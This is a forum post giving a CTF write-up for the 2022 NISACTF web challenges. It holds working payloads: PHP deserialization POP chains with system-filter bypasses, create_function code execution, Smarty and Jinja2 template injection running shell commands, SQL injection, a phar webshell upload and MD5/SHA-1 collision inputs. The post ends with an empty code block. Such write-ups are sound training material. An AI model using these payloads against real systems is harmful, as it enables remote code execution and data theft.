ToB企服应用市场:ToB评测及商务社交产业平台

标题: 2022NISACTF--WEB [打印本页]
作者: 半亩花草    时间: 2022-10-30 18:11
标题: 2022NISACTF--WEB
easyssrf

打开题目,显示的是

尝试输入, 发现输入flag有东西

读取文件

访问下一个网站

读取文件 不能以file开头  直接伪协议,base64解码

checkIn

奇怪的unicode编码
当选中左边的时候右边也会被选中

我们在vscode看看 这样的额

展示的是UTF-16 三位16进制 转化一下UTF-8
  1. U+202E 0xE2 0x80 0xAE   %E2%80%AE
  2. U+2066 0xE2 0x81 0xA6   %E2%81%A6
  3. U+2069 0xE2 0x81 0xA9   %E2%81%A9
复制代码
调整一下就好了
payload
  1. ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF
复制代码

level-up

考点 hash强碰撞  parse_url函数漏洞   create_funcion函数代码执行
打开题目,查看源码

disallow 一般robots.txt里会有  查看一下,进入第二关

第二关 md5 碰撞绕过
  1. array1=abc%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D6%16y%AC%CE%C5%A1LrY5fn%94%10%D9%01%C3%AC%F8%AAN%21%D0%27%BE%3Ej%A7%22%0C%D08%D3%AF%DFRo%2F%A4%8B%E8%EB45j%E4h%9C%21%22%AB%7E%BC%8E%7C%17%9E%C3Xg%D7%A8%CDHt%BE%AB.%2FWb%3Eb%EA%FC%261%0F_%3D%AFo%3F%1E%DE%E8i%86%7D%BF%C7_Q%CDA%B4%CF%B8n%06Ir%7F%5C%A3k%F9%2AO%DFF%2A%F3%8BcH%FF%85%3F%0D%D0%9B%C7%C8-%12%92
  3. array2=abc%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%D6%16y%AC%CE%C5%A1LrY5fn%94%10%D9%01%C3%ACx%AAN%21%D0%27%BE%3Ej%A7%22%0C%D08%D3%AF%DFRo%2F%A4%8B%E8%EB45%EA%E4h%9C%21%22%AB%7E%BC%8E%7C%17%9E%C3%D8g%D7%A8%CDHt%BE%AB.%2FWb%3Eb%EA%FC%261%0F_%3D%AFo%BF%1E%DE%E8i%86%7D%BF%C7_Q%CDA%B4%CF%B8n%06Ir%7F%5C%A3k%F9%2A%CF%DEF%2A%F3%8BcH%FF%85%3F%0D%D0%9BG%C8-%12%92
复制代码
进入第三关
  1. array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
  3. array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
复制代码
进入第四关

先了解一下parse_url函数:解析 URL,返回其组成部分
方法一、php传参解析:不规范的被转化为_;NI+ => NI_
方法二、parse_url函数漏洞
  1. http://xxxx/xx.php?xx=xx   解析的query  为xx=xx
  2. http://xxxx///xx.php?xx=xx 解析的query  为NULL 就是解析不到query
复制代码
进入第五关

ok 这个形式 形似之前我做的笔记,第二个参数会被当作命令执行

考点应该是 create_function 方法
分析该正则
  1. if(preg_match('/^[a-z0-9_]*$/isD',$a)){
  2.     show_source(__FILE__);
  3. }
复制代码
  1. /i不区分大小写
  2. /s匹配任何不可见字符,包括空格、制表符、换页符等等,等价于[fnrtv]
  3. /D如果使用$限制结尾字符,则不允许结尾有换行;
  5. 意思就是 匹配字母数字下划线开头的字符
  6. 我们需要找到一个不以数字,字母,下划线等开头的value,同时可以正常执行函数
  7. 可以是fuzz找 就是 ascii码32-126作为第一个参数 发请求 看响应
  8. 找到的是 \ 也就是 %5c
复制代码
构造一下
  1. a=\create_function&b=;}phpinfo();/*
复制代码


babyupload

考点:python的os.path函数漏洞
查看源码

访问 下载源码
Flask写的后端,上传的文件名不能有.  返回一个路径

拼接路径 读取文件

os.path漏洞

所以说
  1. os.path("upload/",'/flag') => os.path('/flag')
复制代码
一般来讲 flag都是在根目录下载flag  特别是这样的考点
上传的文件名为 /flag  就会读取内容


bingdundun~

考点:phar伪协议读取压缩文件
打开题目

说的可以上传压缩包,我们制造一个压缩包木马 然后 phar 读取试试
这里刚开始上传rar不可以 上传的zip
  1. 写木马=>压缩成zip
复制代码

执行成功,寻找flag

babyserialize

考点:反序列POC构造  system绕过
一眼反序列化  打开题目为源码
  1. include "waf.php";
  2. class NISA{
  3.     public $fun="show_me_flag";
  4.     public $txw4ever;
  5.     public function __wakeup()
  6.     {
  7.         if($this->fun=="show_me_flag"){
  8.             hint();
  9.         }
  10.     }
  12.     function __call($from,$val){
  13.         $this->fun=$val[0];
  14.     }
  16.     public function __toString()
  17.     {
  18.         echo $this->fun;
  19.         return " ";
  20.     }
  21.     public function __invoke()
  22.     {
  23.         checkcheck($this->txw4ever);
  24.         @eval($this->txw4ever);
  25.     }
  26. }
  28. class TianXiWei{
  29.     public $ext;
  30.     public $x;
  31.     public function __wakeup()
  32.     {
  33.         $this->ext->nisa($this->x);
  34.     }
  35. }
  37. class Ilovetxw{
  38.     public $huang;
  39.     public $su;
  41.     public function __call($fun1,$arg){
  42.         $this->huang->fun=$arg[0];
  43.     }
  45.     public function __toString(){
  46.         $bb = $this->su;
  47.         return $bb();
  48.     }
  49. }
  51. class four{
  52.     public $a="TXW4EVER";
  53.     private $fun='abc';
  55.     public function __set($name, $value)
  56.     {
  57.         $this->$name=$value;
  58.         if ($this->fun = "sixsixsix"){
  59.             strtolower($this->a);
  60.         }
  61.     }
  62. }
  64. if(isset($_GET['ser'])){
  65.     @unserialize($_GET['ser']);
  66. }else{
  67.     highlight_file(__FILE__);
  68. }
  70. ?>
复制代码
一步一步的分析
  1. # 这里可以先看看提示
  2. public function __wakeup()
  3. {
  4.     if($this->fun=="show_me_flag"){
  5.         hint();
  6.     }
  7. }
  9. # 构造
  10. ?ser=O:4:"NISA":2:{s:3:"fun";s:12:"show_me_flag";s:8:"txw4ever";N;}
复制代码

然后接着分析 先找到目的地
  1. # NISA类的
  2. # __invoke以函数的形式调用对象时触发
  3. public function __invoke()
  4. {
  5.     checkcheck($this->txw4ever);
  6.     @eval($this->txw4ever);
  7. }
  9. # 发现  Ilovetxw类有
  10. # $this->su=new NISA();
  11. # __toString 将对象当作字符串处理的时候触发
  12. public function __toString(){
  13.     $bb = $this->su;
  14.     return $bb();
  15. }
  17. # 发现了两处
  18. # 1.NISA类的
  19. public function __wakeup()
  20. {
  21.     if($this->fun=="show_me_flag"){
  22.         hint();
  23.     }
  24. }
  26. # 2.four类的
  27. public function __set($name, $value)
  28. {
  29.     $this->$name=$value;
  30.     if ($this->fun = "sixsixsix"){
  31.         strtolower($this->a);
  32.     }
  33. }
复制代码
我们先根据第一处构造POC
  1. class NISA{
  2.     public $fun;
  3.     public $txw4ever;
  4. }
  6. class Ilovetxw{
  7.     public $huang;
  8.     public $su;
  9. }
  10. $a = new NISA();
  11. $b = new Ilovetxw();
  12. $b->su = $a;
  13. $a->txw4ever = "phpinfo();";
  14. $a->fun = $b;
  15. echo((serialize($a)));
复制代码
说明是对的不过被waf挡住了而已

过滤了system
  1. 命令执行函数system()绕过
  2. "\x73\x79\x73\x74\x65\x6d"("cat%20/flag");
  3. (sy.(st).em)(whoami);
复制代码

最终的POC
  1. class NISA{
  2.     public $fun;
  3.     public $txw4ever;
  4. }
  6. class Ilovetxw{
  7.     public $huang;
  8.     public $su;
  9. }
  10. $a = new NISA();
  11. $b = new Ilovetxw();
  12. $b->su = $a;
  13. $a->txw4ever = '"\x73\x79\x73\x74\x65\x6d"("cat /f*");';
  14. $a->fun = $b;
  15. echo((serialize($a)));
复制代码
第二处构造POC
  1. # NISA类的
  2. # __invoke以函数的形式调用对象时触发
  3. public function __invoke()
  4. {
  5.     checkcheck($this->txw4ever);
  6.     @eval($this->txw4ever);
  7. }
  9. # 发现  Ilovetxw类有
  10. # $this->su=new NISA();
  11. # __toString 将对象当作字符串处理的时候触发
  12. public function __toString(){
  13.     $bb = $this->su;
  14.     return $bb();
  15. }
  17. # 2.four类的
  18. # __set给不可访问 不存在的属性赋值时触发
  19. # $this->a=new Ilovetxw();
  20. public function __set($name, $value)
  21. {
  22.     $this->$name=$value;
  23.     if ($this->fun = "sixsixsix"){
  24.         strtolower($this->a);
  25.     }
  26. }
  28. # Ilovetxw类的
  29. # $this->huang=new four();
  30. # __call调用不存在的方法触发
  31. public function __call($fun1,$arg){
  32.     $this->huang->fun=$arg[0];
  33. }
  35. # TianXiWei类的
  36. #  $this->ext=new Ilovetxw();
  37. public function __wakeup()
  38. {
  39.     $this->ext->nisa($this->x);
  40. }
复制代码
合起来构造
  1. class NISA{
  2.     public $fun;
  3.     public $txw4ever;
  4. }
  6. class TianXiWei{
  7.     public $ext;
  8.     public $x;
  9. }
  11. class Ilovetxw{
  12.     public $huang;
  13.     public $su;
  14. }
  16. class four{
  17.     public $a;
  18.     private $fun;
  19. }
  20. $a=new TianXiWei();
  21. $b=new Ilovetxw();
  22. $c=new four();
  23. $d=new NISA();
  24. $a->ext=$b;
  25. $b->huang=$c;
  26. $c->a=$b;
  27. $b->su=$d;
  28. $d->txw4ever="system('ls');";
  29. echo urlencode(serialize($a));
复制代码
也是成功的

绕过
  1. class NISA{
  2.     public $fun;
  3.     public $txw4ever;
  4. }
  5. class TianXiWei{
  6.     public $ext;
  7.     public $x;
  8. }
  9. class Ilovetxw{
  10.     public $huang;
  11.     public $su;
  12. }
  13. class four{
  14.     public $a;
  15.     private $fun;
  16. }
  17. $a=new TianXiWei();
  18. $b=new Ilovetxw();
  19. $c=new four();
  20. $d=new NISA();
  22. $a->ext=$b;
  23. $b->huang=$c;
  24. $c->a=$b;
  25. $b->su=$d;
  26. $d->txw4ever="(sy.(st).em)('cat /f*');";
  28. echo urlencode(serialize($a));
复制代码

midlevel

考点:Smarty SSTI
打开题目显示了IP  肯定时根据xff显示的IP 所以我们的可控点就是xff   来到最后看到


使用的是Smarty模板  考虑服务器模板注入
Smarty的注入方式{if phpinfo()}{/if} 尝试一下
<img alt="image-20221030160247518" loading="lazy">
OK 已经出答案了
  1. X-Forwarded-For:{if system('nl /f*')}{/if}
复制代码


join-us

考点:join using 无列名注入
访问登录页面,看到一个cat u get flag 输入框 试试sql注入
有报错信息

黑名单
  1. by updatexml database union columns = substr
复制代码

爆数据库名
这里一步一步的测试过滤什么的时候,发现了 泄露了表的名称
在查询是 如果查询的列不存在 并且 没有关闭报错信息 可以查询一个不存在的列 这样会报错

爆表名
方法一、brup爆破
这里忘记了考虑 过滤= like替换了 直接爆破 一般我们创建的表都是在最后的


方法二、like替换=

join using 爆破列名

查出来Fal_flag有以下三列
  1. id
  2. data
  3. i_tell_u_this_is_Fal(se)_flag_is_in_another
  4. 1'or/**/extractvalue(1,concat(0x7e,(select * from(select * from Fal_flag a join Fal_flag b using(id,data,i_tell_u_this_is_Fal(se)_flag_is_in_another))c),0x7e))--+
复制代码
提示不在这个表中 去看另外一个表


  1. {3bfb0ba4-dac9-425a-9e0f-cf2672d7afdd}
复制代码
或者查data,结果都是一样的,配个mid 显示后面的

is secret

考点:RC4、SSTI
打开之后 这样,让我们发现secret
尝试 传参 /secret 等等 发现是/secret

页面:

意思就是给他secret 它返回加密的内容

看 第一个加密时字母 其余的不可见 猜测可能加密的字符长度受限  试试看
果然 泄露了敏感信息 分析一下

找一个RC4加密的脚本
  1. import base64
  2. from urllib import parse
  5. def rc4_main(key="init_key", message="init_message"):  # 返回加密后得内容
  6.     s_box = rc4_init_sbox(key)
  7.     crypt = str(rc4_excrypt(message, s_box))
  8.     return crypt
  11. def rc4_init_sbox(key):
  12.     s_box = list(range(256))
  13.     j = 0
  14.     for i in range(256):
  15.         j = (j + s_box[i] + ord(key[i % len(key)])) % 256
  16.         s_box[i], s_box[j] = s_box[j], s_box[i]
  17.     return s_box
  20. def rc4_excrypt(plain, box):
  21.     res = []
  22.     i = j = 0
  23.     for s in plain:
  24.         i = (i + 1) % 256
  25.         j = (j + box[i]) % 256
  26.         box[i], box[j] = box[j], box[i]
  27.         t = (box[i] + box[j]) % 256
  28.         k = box[t]
  29.         res.append(chr(ord(s) ^ k))
  30.     cipher = "".join(res)
  31.     return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
  34. key = "HereIsTreasure"  # 此处为密文
  35. message = input("请输入明文:\n")
  36. enc_base64 = rc4_main(key, message)
  37. enc_init = str(base64.b64decode(enc_base64), 'utf-8')
  38. enc_url = parse.quote(enc_init)
  39. print("rc4加密后的url编码:" + enc_url)
  40. # print("rc4加密后的base64编码"+enc_base64)
复制代码
运行RC4 加密
  1. {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()")}}{% endif %}{% endfor %}
复制代码

ls换成cat /flag.txt
  1. {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /f*').read()")}}{% endif %}{% endfor %}
复制代码

popchains

考点:反序列化链子构造、flag藏得位置
  1. class Road_is_Long{
  2.     public $page;
  3.     public $string;
  4.     public function __construct($file='index.php'){
  5.         $this->page = $file;
  6.     }
  7.     //3.$this->string=new  Make_a_Change
  8.     // 把实例当作字符串处理触发
  9.     public function __toString(){
  10.         return $this->string->page;
  11.     }
  13.     public function __wakeup(){
  14.         // 这里
  15.         if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
  16.             echo "You can Not Enter 2022";
  17.             $this->page = "index.php";
  18.         }
  19.     }
  20. }
  22. class Try_Work_Hard{
  23.     protected  $var;
  24.     # 终点
  25.     public function append($value){
  26.         include($value);
  27.     }
  28.     # 1.调用终点   __invoke 以函数形式调用时触发
  29.     public function __invoke(){
  30.         $this->append($this->var);
  31.     }
  32. }
  34. class Make_a_Change{
  35.     public $effort;
  36.     public function __construct(){
  37.         $this->effort = array();
  38.     }
  39.        
  40.     public function __get($key){
  41.         // 2.  $this->effort=new Try_Work_Hard();
  42.         //  __get 访问不存在 不可访问的属性触发
  43.         $function = $this->effort;
  44.         return $function();
  45.     }
  46. }
复制代码
构造的POC
[code]



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4